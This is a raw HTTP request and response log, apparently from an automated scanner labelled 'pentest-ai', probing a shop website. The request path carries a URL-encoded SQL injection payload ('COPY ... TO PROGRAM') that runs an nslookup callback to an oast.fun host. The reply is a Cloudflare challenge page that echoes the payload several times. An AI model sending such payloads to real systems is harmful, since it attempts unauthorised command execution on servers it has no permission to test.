REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%3B%20COPY%20%28SELECT%20%27%27%29%20TO%20PROGRAM%20%27nslookup%20h0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun%27%3B--%20-/assets/component-totals.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9845
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8477bb8b1a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=yv6DM%2ByI%2FzkP7jBCD%2BY0oPwJ8QwHnl4LotTZeACMgasJowziA8S2sksWLuV7OZToqoeGloAdHHan60RDhGbG%2FsTsVDfl1oBchJL31CNPsbtb%2BLL%2FEovBzNMG7Dou6YVpbviRG2kqozEbubYFeQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8477bb8b1a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '21UmMpyn0LBAvFeajMmfZRU8SgDffHKFd4SRdbHlGEo-1784281164-1.2.1.1-O9KHebdLwcQqaTOVXhWd32QZIT6uxPcoOrhAFO6TpJPHKZ7ryeEbsM5uk2ehcVCO',cITimeS: '1784281164',cRay: 'a1c8477bb8b1a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/';%20COPY%20(SELECT%20'')%20TO%20PROGRAM%20'nslookup%20h0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun';--%20-/assets/component-totals.css?__cf_chl_tk=fTTBcazDXFKhhOLq6hcLTqhCgu0T9zlL3G6gT3uWjmE-1784281164-1.0.1.1-4B7DJLP0sFchUsle5Gu33K2Fl_jNc4HKq8q77rolkvU",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/';%20COPY%20(SELECT%20'')%20TO%20PROGRAM%20'nslookup%20h0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun';--%20-/assets/component-totals.css?__cf_chl_f_tk=fTTBcazDXFKhhOLq6hcLTqhCgu0T9zlL3G6gT3uWjmE-1784281164-1.0.1.1-4B7DJLP0sFchUsle5Gu33K2Fl_jNc4HKq8q77rolkvU",md: 'QxD4nLsNtpuK3eq6DNkKLRWNx.K.X.fA9nAbl5lmF1g-1784281164-1.2.1.1-4GV7vUci8vlV4lW2USFy3u3gO3GhwzGCT9i5iGLSJATwJ7.MVuohK8uiPBL.o2YEfC.B9JjrLPS97U_0qqnquHMlkiKV.2BK2CE1lO5Ps2dndAJwKYqKQPVjXU_qNfABIWCzlbr8qmeJxqNtBW84RQjnIWf.ymKYrSQpMZhXihbp0pUQ3sddwBfjVs1RuVTBUC7VqIWTbfC363J75ZZ_iL7wL0HU0rOg5tcqjwrVeS4ra_M2O.vmqrWbmRpF9rbjSkZqmpNjYa1MqLz0c9zFjwpylGwnBGlvH8.Pj_ZdUoC37ZcTQyMkNRFg2uAOFp1AL.Nhv8EtEtdSjWPETnXyNtKd8kSyufWcR6vUOD0GArXlWCpieMEprpjA4MME8_BhQS3aQHsqh5ID_1gGeOxbE7oPS2OUqXIyGBww2Z83NV6_AjDRBSB9qa1haER5wm3VBVBU4E.W7gqICgaxXYVaI9aR6Uj8Z20R0S5siu2qUtflGVjgOdxF8qGz.DuPcVuALwZDHYPSSY_RkM7fW6HLpvt9GmnL6k3iJxbq26Q_9XW83Q2UVs2WTCuNFEwMcySfZB628p3pdaqG7EQiMoPo97z0hx1jWz14I.GHxuUcA_NBcqNXcbBWHvdnc0dgcdfKBnLiUyYdQCitHf5NkH8o3vNMRE_ZYAqBC6fUKShFf3GKL3t7rm_cBgF1QHIDQPrztGVRnVxfNDzUCqt20toOrO6O6ligdSlPCMpS8Tvx4vTF_kYNnSO0lO74QIH6nXEj5QxIBzoENV8EXxZRkeOJsGN6ol_.r79ZJy1uXbZ6xfj9Z4j3R.ceW.QLQJUNCgF3B_PqUSc4UTxo0w1mQAK9qHoLFDE36P.nHks.vc56aWAqVxvouu9M.yPJjOyapOQwoLGBvIzlZ1Oph6sjllqUf5s4oDP73xv2R52K8TQ3ArmSdzFTLX93BQOjnkIakhly9n_DcBpCKlb3j3sTlkfXrzfxqP8cTzLwdrExxqE11lcUm9Tt5.48O9RrL9S6ogzIbXqH9GvKp8AsPpNcnU.Qy3i_hVhWiqlaPJQvGFC4cMch2AOo4VmYEZQddyhG4Qg.FCoKi7hQOebaC8cOuarkjJahCa9zASlMiEx961tsph.nQ_.OhSsiYI6TZkOXl_1d6TEGG58SOviQQiDp6F6ULeKeNURv3JPWZFC_otk3lWJ8lzD3cGIbpWDcGOb3nxd8o8lNs2kh_4cEsfWlCMp1MpUO6UgN.oDVqsRoMikc6YEAQcZ6ZynnXRgu.ABVuvknM_ubFI8cgSRmU8dMyc8VdZHh3umVgMTXVSFMFdPAG1.7EN6bkazMRpNLd7x929aK9r9PPYX1a2vAqcfEPd1OcQ',mdrd: '9QP4QWa4vMQxi0Ucr11g0rucRf.FxZk0l7QPdcfBaKg-1784281164-1.2.1.1-1b024u83ax_fJ8Q2KFTUy2g5m5O5iC2yrpXEpiIs6PyfE_rpp39JRKsca1XzQTd36ImnZSd9xa2TwuPjEsuGGcWsKx1OwrPKmlu9OOyqov9N28CKGLcBEIKpqZft4OVuleBgf14fUuW0vN1ZeZU2taJEKc3YlTKLVEi_.m00j3nBF_wzGnBe7yq7ZPy_nX5Gov7L6L5TsiD6SzpHIMG0ts_6_RHE50sUxjt6llsSRTPH.Yjr3XwnmmCfGDvmHjWA',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8477bb8b1a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/';%20COPY%20(SELECT%20'')%20TO%20PROGRAM%20'nslookup%20h0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun';--%20-/assets/component-totals.css?__cf_chl_rt_tk=fTTBcazDXFKhhOLq6hcLTqhCgu0T9zlL3G6gT3uWjmE-1784281164-1.0.1.1-4B7DJLP0sFchUsle5Gu33K2Fl_jNc4HKq8q77rolkvU"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
